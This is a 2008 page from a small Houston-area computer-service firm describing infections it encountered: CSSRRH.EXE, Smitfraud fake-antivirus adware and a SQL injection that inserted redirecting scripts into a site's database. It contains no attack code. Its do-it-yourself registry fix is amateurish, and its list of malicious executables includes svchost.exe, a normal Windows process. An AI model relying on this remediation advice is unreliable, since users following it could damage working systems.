The DPS logo

     Home

     DPS Consulting

     Website Creation

     Classes

     Class Schedule

 

NEW VIRUSES

This week, two of our office computers were hit with a virus, a different one on each computer - both pretty devastating, then as if it weren't enough, our server was attacked. Both viruses are very destructive to any computer they attach to, shutting them down completely in a very short time.

Initially, we did what most computer savvy people would do -we checked with the top virus protection companies. Neither Norton, Mcafee, Trend-micro or ABG had either heard of them or worked up any definitions for them (we run up-to-date protection on all of our computers).

Fortunately, being bit-mechanics ourselves, we set out to restore our computers to some semblance of working order. It took three days to track down all the damage they did and remove the offending programs.

VIRUS #1
CSSRRH.EXE
(NOTE: Here is a link to a temorary patch, we are working on a perminent solution)

Do Not Download Alcatech BPM Studio Pro from www.minova.org (or anywhere until you know it is safe)

DOWNLOAD FIX

This virus is probably piggy-backed on many unsuspecting music and software programs available for download. We acquired ours from downloading Alcatech BPM Studio Pro from www.minova.org. This virus is very destructive and uses a module to replicate itself in the computer register at such a fast pace that in about 2 minutes it overloads your processes and shuts down your computer. Although we haven't yet found the module that spawns the child (CSSRRH.EXE), we have found a way to stop it from overloading your computer. We suspect that the adult spawner is a DLL.

For those of you that are tech-savvy enough to work with the register, here is a quick fix until we find the adult spawner:
You need to boot-up from a CD if you have a rescue disk. If you don't boot up in safe mode.
go to start, click on run and type in regedit and press enter. search regedit for CSSRRH and delete all instances in the register.
exit the run window and search your computer for CSSRRH.exe and rename it.
Create a text file with any message you wish to utter and name it CSSRRH.EXE and save it to the same place the original file was.

This will stop it from damaging your computer.
When you reboot you will encounter a message that says it can not install CSSRRH - pay attention to the file name that presents that message and delete it if possible. We will post here when we find the spawner.

Virus #2
Smitfraud

This is a nasty virus that completely devastates your computer. It happened so fast we still don't know all that happened in the first few minutes, but we can tell you where we got it from. We were searching for some information on "possession of Firearms in Texas". We hit a forum then clicked on one of the threads. After that it was all over. The only cure for the home pc user that wants to solve it themselves is to back up your data and reformat the hard drive.

Symptoms:

  • Pops up a notice that your computer is infected with 497 (number may vary) adwares.
  • Then a notice to purchase a virus protection right now
  • Then a blue screen with the virus protection ad
  • It disables your desktop tabs (desktop and themes) so you can't change it
  • When your computer times out and goes to Screen-saver mode, it cycles a fake black screen and error message, with a fake reboot over and over (pressing any key resumes what you were doing)

There are many variations of this virus; this is the most common version. Smitfraud installs itself into a computer the instant you click on an infected link. These links are often disguised as the answer to a search query. The first evidence of it is the famous blue screen. An error message is displayed mimicking Microsoft Windows errors. You will then get popups advertising a virus removal that will “fix your computer”. Clicking on this will just get you in deeper.  These alert messages often scare a PC user into buying their spyware protection software. This virus can replace many of your important windows files with their infected ones.

Here are some of the DLL files that are then installed on your computer: iereport.dll, ossmart.dll, tlhelp.dll, mssms.dll, vpnconfig.dll, wmpdev.dll, wmphost.dll. advsort.dll,
These executable files are most often found also: wincrt.exe, intell321.exe, m00.exe, policyverifier.exe, printer.exe, psguard.exe, svchost.exe, sysmonms.exe, winntify.exe,  intel32.exe, zloader3.exe.

Call us, we can help you get rid of this one

If you have more info on removing this one, email us so we can post it.

Virus #3
WEBSITE HIJACKER
ASCII Encoded/Binary String Automated SQL Injection Attack

This information is only useful for those that have a website that is databased, most likely only MS-Sqlserver or Mysql. We discovered our problem when the refreshes on our site took forever to load. Soon after, Google quarantined our site advising us that the link to our site was being redirected to a malware site.

What we discovered was that our database had been hacked and a script - <script> - had been inserted after each category in our menu system. The script redirected the visitor to 5 other sites that contained malware. These low-lifes rotate the sites they include in the string, so publishing a list won't help you. This is not only a method of passing on malware, but a method of increasing hits to their site. Once we found the script, the cure was just the time consuming job of accessing each menu item in the database and deleting the script. We suspect that the intruder got in by breaking into our back office. If your ecommerce site has a data-based inventory accessed by a content management system, make sure it is as bullet-proof as you possibly can.

What we are describing is the simplest form of intrusion by these pirates. If the attack on your system is more complex that this, have your programmer visit the following site for more in depth explanation and cure.

http://www.bloombit.com/

Lee & Dan Siemon
281.528.1247 Home, office
717.645.9282 Cell

Or Email:

The DPS Group.net

We provide computer service, training and computer tune-up to the North Houston area and Montgomery County Texas, including but not limited to, Spring Texas, The Woodlands Texas, Conroe Texas, Willis Texas, Montgomery Texas, Tomball Texas, Humble Texas, Kingwood Texas, Cleveland Texas (Liberty County) and all points in between. If we missed yours, give us a call.

Copyright The DPS Group, LLC 2008